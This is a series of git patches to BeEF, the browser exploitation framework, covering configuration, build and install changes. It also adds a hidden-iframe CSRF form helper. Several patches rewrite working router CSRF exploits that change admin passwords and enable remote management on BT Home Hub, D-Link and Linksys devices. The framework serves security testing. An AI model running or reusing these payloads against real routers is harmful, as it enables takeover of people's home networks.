From 3d2678212549a5d056290c79e0bde43e7c1c556e Mon Sep 17 00:00:00 2001 From: Nikolaos Anastopoulos Date: Fri, 23 Mar 2012 15:09:46 +0200 Subject: [PATCH 01/21] Added public port setting to server configuration --- config.yaml | 1 + core/main/handlers/modules/beefjs.rb | 6 ++++++ core/main/server.rb | 5 ++++- 3 files changed, 11 insertions(+), 1 deletion(-) diff --git a/config.yaml b/config.yaml index 679d183f6..d01fd3649 100644 --- a/config.yaml +++ b/config.yaml @@ -32,6 +32,7 @@ beef: port: "3000" # if running behind a nat set the public ip address here #public: "" + #public_port: "" dns: "localhost" panel_path: "/ui/panel" hook_file: "/hook.js" diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index a43fc5674..054a047e1 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -48,6 +48,12 @@ module Modules hook_session_config['beef_url'].sub!(/0\.0\.0\.0/, req_host) end + # @note if http_port <> public_port in config ini, use the public_port + if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] + hook_session_config['beef_port'] = hook_session_config['beef_public_port'] + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + end + # @note populate place holders in the beefjs string and set the response body eruby = Erubis::FastEruby.new(beefjs) @body << eruby.evaluate(hook_session_config) diff --git a/core/main/server.rb b/core/main/server.rb index e47eb1fd1..b29a78665 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -29,7 +29,8 @@ module BeEF def initialize @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - @url = "http://#{beef_host}:#{@configuration.get("beef.http.port")}" + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") + @url = "http://#{beef_host}:#{beef_port}" @root_dir = File.expand_path('../../../', __FILE__) @command_urls = {} @mounts = {} @@ -44,6 +45,8 @@ module BeEF 'beef_root_dir' => @root_dir, 'beef_host' => @configuration.get('beef.http.host'), 'beef_port' => @configuration.get('beef.http.port'), + 'beef_public' => @configuration.get('beef.http.public'), + 'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_dns' => @configuration.get('beef.http.dns'), 'beef_hook' => @configuration.get('beef.http.hook_file') } From e4d4edba7524e96d3f5ed0acf4431cc00b281b7b Mon Sep 17 00:00:00 2001 From: Nikolaos Anastopoulos Date: Fri, 23 Mar 2012 20:42:12 +0200 Subject: [PATCH 02/21] Public port setting affects URI scheme --- config.yaml | 2 +- core/main/client/net.js | 2 +- core/main/handlers/modules/beefjs.rb | 5 ++++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/config.yaml b/config.yaml index d01fd3649..21f5acc9e 100644 --- a/config.yaml +++ b/config.yaml @@ -32,7 +32,7 @@ beef: port: "3000" # if running behind a nat set the public ip address here #public: "" - #public_port: "" + #public_port: "" dns: "localhost" panel_path: "/ui/panel" hook_file: "/hook.js" diff --git a/core/main/client/net.js b/core/main/client/net.js index b5340d472..0d1e97f45 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -124,7 +124,7 @@ beef.net = { push: function(stream) { //need to implement wait feature here eventually for (var i = 0; i < stream.pc; i++) { - this.request('http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); + this.request(this.port == '443' ? 'https' : 'http', 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null); } }, diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 054a047e1..0d9572a99 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -51,7 +51,10 @@ module Modules # @note if http_port <> public_port in config ini, use the public_port if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] hook_session_config['beef_port'] = hook_session_config['beef_public_port'] - hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + if hook_session_config['beef_public_port'] == '443' + hook_session_config['beef_url'].sub!(/http:/, 'https:') + end end # @note populate place holders in the beefjs string and set the response body From dc269b15b14435eca710b741da717eab184fe681 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Mon, 30 Apr 2012 15:10:54 +1000 Subject: [PATCH 03/21] Version updated --- VERSION | 2 +- config.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/VERSION b/VERSION index aafd485c3..509c304b2 100644 --- a/VERSION +++ b/VERSION @@ -14,4 +14,4 @@ # limitations under the License. # -0.4.3.4-alpha +0.4.3.5-alpha diff --git a/config.yaml b/config.yaml index 669bb5bdd..7159582be 100644 --- a/config.yaml +++ b/config.yaml @@ -16,7 +16,7 @@ # BeEF Configuration file beef: - version: '0.4.3.4-alpha' + version: '0.4.3.5-alpha' debug: false restrictions: From 53c6fb5252fde1fcb07760432a7f4c7d4294dce8 Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 3 May 2012 15:32:53 +0930 Subject: [PATCH 04/21] Fixed typo in module name/category --- modules/hooked_domain/ajax_fingerprint/config.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/hooked_domain/ajax_fingerprint/config.yaml b/modules/hooked_domain/ajax_fingerprint/config.yaml index 32e2c3156..b1cd1b6ce 100644 --- a/modules/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/hooked_domain/ajax_fingerprint/config.yaml @@ -17,8 +17,8 @@ beef: module: ajax_fingerprint: enable: true - category: "Host" - name: "Hooked Domain" + category: "Hooked Domain" + name: "Fingerprint Ajax" description: "Fingerprint Ajax and JS libraries present on the hooked page." authors: ["qswain"] target: From 99d47351b7b13f3a19986295bc4b6aff4f290450 Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 3 May 2012 15:54:46 +0930 Subject: [PATCH 05/21] Patched newline issue in request() in net.js See commit c3435ee345bcf77da4bb1cf6035d0103e5655f63 for more info --- core/main/client/net.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/core/main/client/net.js b/core/main/client/net.js index b4dd6f590..889503569 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -146,7 +146,7 @@ beef.net = { request: function(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) { //check if same domain or cross domain var cross_domain = true; - if (document.domain == domain){ + if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks if(document.location.port == "" || document.location.port == null){ cross_domain = !(port == "80" || port == "443"); } From 1cf980f06ec8536828f8485ad1b74e24218bb5ad Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Fri, 4 May 2012 07:21:57 +1000 Subject: [PATCH 06/21] Added CDE Task to Rakefile Initial CDE Generator script, will clone latest CDE package, make, then create beef cde Package --- Rakefile | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/Rakefile b/Rakefile index 06b2dc27a..e06ddf1e1 100644 --- a/Rakefile +++ b/Rakefile @@ -152,3 +152,22 @@ task :dmg do puts "\nBeEF.dmg created\n" end + +################################ +# Create CDE Package +# This will download and make the CDE Executable and +# gnereate a CDE Package in cde-package + +task :cde do + puts "\nCloning and Making CDE..."; + sh "git clone git://github.com/pgbovine/CDE.git"; + Dir.chdir "CDE"; + sh "make"; + Dir.chdir ".."; + puts "\nCreating CDE Package...\n"; + sh "./CDE/cde ruby beef"; + sleep (1) + puts "\nCleaning Up...\n"; + sh "rm -r CDE"; + puts "\nCDE Package Created…\n"; + From f566a00fdf9239a5c030b1406ca4cfb669540f7b Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Fri, 4 May 2012 08:09:58 +1000 Subject: [PATCH 07/21] fix to cde script removed non-ascii char --- Rakefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Rakefile b/Rakefile index e06ddf1e1..6c8ff7d91 100644 --- a/Rakefile +++ b/Rakefile @@ -169,5 +169,5 @@ task :cde do sleep (1) puts "\nCleaning Up...\n"; sh "rm -r CDE"; - puts "\nCDE Package Created…\n"; + puts "\nCDE Package Created...\n"; From e3e4a44ae7ad6cfd195dd1e611619e6c46c29275 Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Fri, 4 May 2012 09:41:12 +1000 Subject: [PATCH 08/21] Bug Fixes for CDE Task --- Rakefile | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Rakefile b/Rakefile index 6c8ff7d91..4e736b699 100644 --- a/Rakefile +++ b/Rakefile @@ -166,8 +166,9 @@ task :cde do Dir.chdir ".."; puts "\nCreating CDE Package...\n"; sh "./CDE/cde ruby beef"; - sleep (1) + sleep (1); puts "\nCleaning Up...\n"; sh "rm -r CDE"; puts "\nCDE Package Created...\n"; + end From e88be791342138a6fff04ad4bc90722faa6dbf0f Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Sun, 6 May 2012 06:11:44 +1000 Subject: [PATCH 09/21] Updated demo page --- extensions/demos/html/basic.html | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html index 57cc03802..f058afc95 100644 --- a/extensions/demos/html/basic.html +++ b/extensions/demos/html/basic.html @@ -15,12 +15,12 @@

- These links are for demonstrating the "collect links" command module
+ These links are for demonstrating the "Get Page HREFs" command module

From 6383f8670b7ae837c2e40397b78a2c5761584faf Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Sun, 6 May 2012 11:46:22 +1000 Subject: [PATCH 10/21] Install Script Script to install prerequisites for OSX/Debian/RHEL, download latest Beef script, install required gems and start beef --- install-beef | 147 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 147 insertions(+) create mode 100644 install-beef diff --git a/install-beef b/install-beef new file mode 100644 index 000000000..2c2401b20 --- /dev/null +++ b/install-beef @@ -0,0 +1,147 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +clear +echo "======================================" +echo " BeEF Installer " +echo "======================================" +echo "" +echo "Detecting OS.."; + + +OS=`uname` + +if [ "${OS}" = "Linux" ] ; then + if [ -f /etc/redhat-release ] ; then + Distro='RedHat' + elif [ -f /etc/debian_version ] ; then + Distro='Debian' + fi + readonly OS + readonly Distro +fi + +if [ "$OS" == "Darwin" ]; then + echo "Mac OSX Detected" + echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.3.." + bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) + source ~/.bash_login + rvm install 1.9.3-p0 --with-gcc=clang + rvm use 1.9.3-p0 + echo "" + echo "Downloading BeEF.." + + git clone git://github.com/beefproject/beef.git + cd beef + + echo "" + echo "Installing Ruby Gems.." + bundle install + OK="yes" + + cd beef + ./beef + + echo "" + echo "==========================================" + echo " Install Complete" + echo "Please restart Terminal and Run BeEF with:" + echo " $ ./beef " + echo "==========================================" + echo "" + +fi + +if [ "$Distro" == "Debian" ]; then + echo "Debian/Ubuntu Detected" + echo "Installing Prerequisite Packages.." + sudo apt-get update + sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake + + echo "Downloading BeEF.." + git clone git://github.com/beefproject/beef.git + cd beef + + echo "Installing Ruby Gems" + sudo gem install bundler + sudo bundle install + + cd beef + ./beef + + OK="yes" + echo "" + echo "==========================================" + echo " Install Complete" + echo "==========================================" + echo "" +fi + + +if [ "$Distro" == "RedHat" ]; then + echo "Redhat/Fedora Detected" + echo "Installing Prerequisite Packages.." + sudo yum install -y git make gcc openssl-devel gcc-c++ patch readline readline-devel zlib zlib-devel libyaml-devel libffi-devel bzip2 autoconf automake libtool bison iconv-devel sqlite-devel + + echo "" + echo "Installing Ruby Version Manager (RVM) & Ruby 1.9.2" + wget https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer + bash ./rvm-installer + source ~/.rvm/scripts/rvm + rvm pkg install openssl + rvm install 1.9.2 --with-openssl-dir=$rvm_path/usr + source ~/.rvm/scripts/rvm + rvm use 1.9.2 --default + + echo "Downloading BeEF.." + git clone git://github.com/beefproject/beef.git + cd beef + + gem install bundler + bundle + + source ~/.bash_profile + + cd beef + ./beef + + OK="yes" + echo "" + echo "==========================================" + echo " Install Complete" + echo "==========================================" + echo "" + +fi + +if [ "$OK" == "yes" ]; then + +else + echo "" + echo "=======================================" + echo " Install Failed" + echo "Unable to locate installer for your OS:" + echo $OS + echo $Distro + echo "=======================================" + echo "" +fi + + + + + + From a62b77cc1d6df34bfb6df689f81cda848386671a Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 7 May 2012 18:26:27 +0930 Subject: [PATCH 11/21] Updated introduction of public port settings These settings are experimental --- config.yaml | 2 +- core/main/console/banners.rb | 1 + core/main/handlers/modules/beefjs.rb | 12 +++++++----- modules/debug/test_network_request/module.rb | 2 +- modules/phonegap/phonegap_persistence/module.rb | 2 +- 5 files changed, 11 insertions(+), 8 deletions(-) diff --git a/config.yaml b/config.yaml index 30b5e3a40..d14c27e09 100644 --- a/config.yaml +++ b/config.yaml @@ -32,7 +32,7 @@ beef: port: "3000" # if running behind a nat set the public ip address here #public: "" - #public_port: "" + #public_port: "" # port setting is experimental dns: "localhost" panel_path: "/ui/panel" hook_file: "/hook.js" diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb index 40d52b825..3621d20e9 100644 --- a/core/main/console/banners.rb +++ b/core/main/console/banners.rb @@ -92,6 +92,7 @@ module Banners self.interfaces.map do |host| # display the important URLs on each interface from the interfaces array print_success "running on network interface: #{host}" + beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port") data = "Hook URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n" data += "UI URL: http://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n" diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 0d9572a99..f5078bf98 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -49,11 +49,13 @@ module Modules end # @note if http_port <> public_port in config ini, use the public_port - if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] - hook_session_config['beef_port'] = hook_session_config['beef_public_port'] - hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) - if hook_session_config['beef_public_port'] == '443' - hook_session_config['beef_url'].sub!(/http:/, 'https:') + unless hook_session_config['beef_public_port'].nil? + if hook_session_config['beef_port'] != hook_session_config['beef_public_port'] + hook_session_config['beef_port'] = hook_session_config['beef_public_port'] + hook_session_config['beef_url'].sub!(/#{hook_session_config['beef_port']}/, hook_session_config['beef_public_port']) + if hook_session_config['beef_public_port'] == '443' + hook_session_config['beef_url'].sub!(/http:/, 'https:') + end end end diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb index e649dbdaa..e4de490dd 100644 --- a/modules/debug/test_network_request/module.rb +++ b/modules/debug/test_network_request/module.rb @@ -24,7 +24,7 @@ class Test_network_request < BeEF::Core::Command def self.options @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - beef_port = @configuration.get("beef.http.port") + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") return [ {'name' => 'scheme', 'ui_label'=>'Scheme', 'type' => 'text', 'width' => '400px', 'value' => 'http' }, diff --git a/modules/phonegap/phonegap_persistence/module.rb b/modules/phonegap/phonegap_persistence/module.rb index 909014fe2..30face23d 100644 --- a/modules/phonegap/phonegap_persistence/module.rb +++ b/modules/phonegap/phonegap_persistence/module.rb @@ -22,7 +22,7 @@ class Phonegap_persistence < BeEF::Core::Command @configuration = BeEF::Core::Configuration.instance beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host") - beef_port = @configuration.get("beef.http.port") + beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port") return [{ 'name' => 'hook_url', From 6f293ba8661bf37a68fe0f36c42b39d16650b57e Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 8 May 2012 16:33:10 +0100 Subject: [PATCH 12/21] Added dynamic module loading in the configuration object --- core/main/configuration.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/core/main/configuration.rb b/core/main/configuration.rb index c6d7de06f..f2469e0f4 100644 --- a/core/main/configuration.rb +++ b/core/main/configuration.rb @@ -118,7 +118,9 @@ module BeEF # Load module configurations def load_modules_config self.set('beef.module', {}) - Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf | + # support nested sub-categories, like browser/hooked_domain/ajax_fingerprint + module_configs = File.join("#{$root_dir}/modules/**", "config.yaml") + Dir.glob(module_configs) do | cf | y = self.load(cf) if y != nil y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '') From ff0dd7e9e2ddcfd0e8311ecb395a61d8f2a4a109 Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 9 May 2012 11:40:35 +1000 Subject: [PATCH 13/21] Undated Installed to include disclaimer and exit option --- install-beef | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/install-beef b/install-beef index 2c2401b20..4da7c9bc1 100644 --- a/install-beef +++ b/install-beef @@ -19,6 +19,16 @@ echo "======================================" echo " BeEF Installer " echo "======================================" echo "" +echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies." +echo "" +echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." +echo "" + +read -p "Are you sure you wish to continue (Y/n)? " +if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then + exit; +fi + echo "Detecting OS.."; From 13c75e87c95c93941f296c88346397ad7c74514a Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 9 May 2012 11:42:26 +1000 Subject: [PATCH 14/21] Revert "Undated Installed to include disclaimer and exit option" This reverts commit ff0dd7e9e2ddcfd0e8311ecb395a61d8f2a4a109. --- install-beef | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/install-beef b/install-beef index 4da7c9bc1..2c2401b20 100644 --- a/install-beef +++ b/install-beef @@ -19,16 +19,6 @@ echo "======================================" echo " BeEF Installer " echo "======================================" echo "" -echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies." -echo "" -echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." -echo "" - -read -p "Are you sure you wish to continue (Y/n)? " -if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then - exit; -fi - echo "Detecting OS.."; From 70f70a339f2d8e2f32c877d64e7ecfa01656c9e4 Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 9 May 2012 11:42:30 +1000 Subject: [PATCH 15/21] Revert "Revert "Undated Installed to include disclaimer and exit option"" This reverts commit 13c75e87c95c93941f296c88346397ad7c74514a. --- install-beef | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/install-beef b/install-beef index 2c2401b20..4da7c9bc1 100644 --- a/install-beef +++ b/install-beef @@ -19,6 +19,16 @@ echo "======================================" echo " BeEF Installer " echo "======================================" echo "" +echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies." +echo "" +echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." +echo "" + +read -p "Are you sure you wish to continue (Y/n)? " +if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then + exit; +fi + echo "Detecting OS.."; From 95cc1ac2d65a07ca93f76af1a9106e32d08c3f5f Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 9 May 2012 11:42:32 +1000 Subject: [PATCH 16/21] Revert "Revert "Revert "Undated Installed to include disclaimer and exit option""" This reverts commit 70f70a339f2d8e2f32c877d64e7ecfa01656c9e4. --- install-beef | 10 ---------- 1 file changed, 10 deletions(-) diff --git a/install-beef b/install-beef index 4da7c9bc1..2c2401b20 100644 --- a/install-beef +++ b/install-beef @@ -19,16 +19,6 @@ echo "======================================" echo " BeEF Installer " echo "======================================" echo "" -echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environment and it's dependencies." -echo "" -echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." -echo "" - -read -p "Are you sure you wish to continue (Y/n)? " -if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then - exit; -fi - echo "Detecting OS.."; From e426b3fb133cf3465936ec3141b5b8fc7e05d122 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 9 May 2012 14:07:13 +0100 Subject: [PATCH 17/21] Added iframe XSRF form in beef.dom (Fixes issue 104) --- core/main/client/dom.js | 31 +++++++++++++++++++++++++++++-- 1 file changed, 29 insertions(+), 2 deletions(-) diff --git a/core/main/client/dom.js b/core/main/client/dom.js index c27f3bb2b..387b514bf 100644 --- a/core/main/client/dom.js +++ b/core/main/client/dom.js @@ -286,10 +286,37 @@ beef.dom = { */ detachApplet: function(id) { $j('#' + id + '').detach(); + }, + + /** + * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests. + * @params: {String} action: the form action attribute, where the request will be sent. + * @params: {String} method: HTTP method, usually POST. + * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value). + * example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}] + */ + createIframeXsrfForm: function(action, method, inputs){ + var iframeXsrf = beef.dom.createInvisibleIframe(); + + var formXsrf = document.createElement('form'); + formXsrf.setAttribute('action', action); + formXsrf.setAttribute('method', method); + + var input = null; + for (i in inputs){ + var attributes = inputs[i]; + input = document.createElement('input'); + for(key in attributes){ + input.setAttribute(key, attributes[key]); + } + formXsrf.appendChild(input); + } + iframeXsrf.contentWindow.document.body.appendChild(formXsrf); + formXsrf.submit(); + + return iframeXsrf; } - - }; beef.regCmp('beef.dom'); From 4faf75f1f1112bfb24189bdd36bb83a053ac8de6 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 9 May 2012 14:20:12 +0100 Subject: [PATCH 18/21] Updated bt_home_hub_xsrf to use the new beef.dom.createIframeXsrfForm JS api --- modules/router/bt_home_hub_csrf/command.js | 31 +++------------------- 1 file changed, 4 insertions(+), 27 deletions(-) diff --git a/modules/router/bt_home_hub_csrf/command.js b/modules/router/bt_home_hub_csrf/command.js index 1537d8d09..d20374dbe 100644 --- a/modules/router/bt_home_hub_csrf/command.js +++ b/modules/router/bt_home_hub_csrf/command.js @@ -17,39 +17,16 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var bt_home_hub_iframe = beef.dom.createInvisibleIframe(); - var form = document.createElement('form'); - form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5"); - form.setAttribute('method', 'post'); - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '0'); - input.setAttribute('value', '31'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '1'); - input.setAttribute('value', ''); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '30'); - input.setAttribute('value', passwd); - form.appendChild(input); - - bt_home_hub_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", + [{'type':'hidden', 'name':'0', 'value':'31'} , + {'type':'hidden', 'name':'1', 'value':''}, + {'type':'hidden', 'name':'30', 'value':passwd}]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - delete form; document.body.removeChild(bt_home_hub_iframe); } setTimeout("cleanup()", 15000); From f84d34ab86401eba8d3171e6970f3092a2ec4dd4 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 9 May 2012 14:26:05 +0100 Subject: [PATCH 19/21] Updated dlink_dsl500t_xsrf to use the new beef.dom.createIframeXsrfForm JS api --- modules/router/dlink_dsl500t_csrf/command.js | 49 +++----------------- 1 file changed, 7 insertions(+), 42 deletions(-) diff --git a/modules/router/dlink_dsl500t_csrf/command.js b/modules/router/dlink_dsl500t_csrf/command.js index 8616d5acf..ae1c98e23 100644 --- a/modules/router/dlink_dsl500t_csrf/command.js +++ b/modules/router/dlink_dsl500t_csrf/command.js @@ -17,48 +17,13 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "/cgi-bin/webcm"; - - var dsl500t_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'getpage'); - input.setAttribute('value', '../html/tools/usrmgmt.htm'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/username'); - input.setAttribute('value', 'admin'); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/password'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/password_confirm'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'security:settings/idle_timeout'); - input.setAttribute('value', '30'); - form.appendChild(input); - - dsl500t_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , + {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, + {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, + {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd}, + {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); From f361e2ac786d35b8f499d2d046450e54ecf12507 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 9 May 2012 14:35:53 +0100 Subject: [PATCH 20/21] Updated lynksys_wrt54g_xsrf to use the new beef.dom.createIframeXsrfForm JS api --- .../router/linksys_wrt54g2_csrf/command.js | 98 +++---------------- 1 file changed, 14 insertions(+), 84 deletions(-) diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js index 036a25aab..0f362bf89 100644 --- a/modules/router/linksys_wrt54g2_csrf/command.js +++ b/modules/router/linksys_wrt54g2_csrf/command.js @@ -18,90 +18,20 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var target = gateway + "Manage.tri"; - - var wrt54g2_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', target); - form.setAttribute('method', 'post'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_USE_HTTP'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_HTTP'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_HTTP_S'); - input.setAttribute('value', 0); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORDMOD'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORD'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM'); - input.setAttribute('value', passwd); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', '_http_enable'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_WLFILTER'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_REMOTE'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_PORT'); - input.setAttribute('value', port); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'MANAGE_UPNP'); - input.setAttribute('value', 1); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'layout'); - input.setAttribute('value', 'en'); - form.appendChild(input); - - 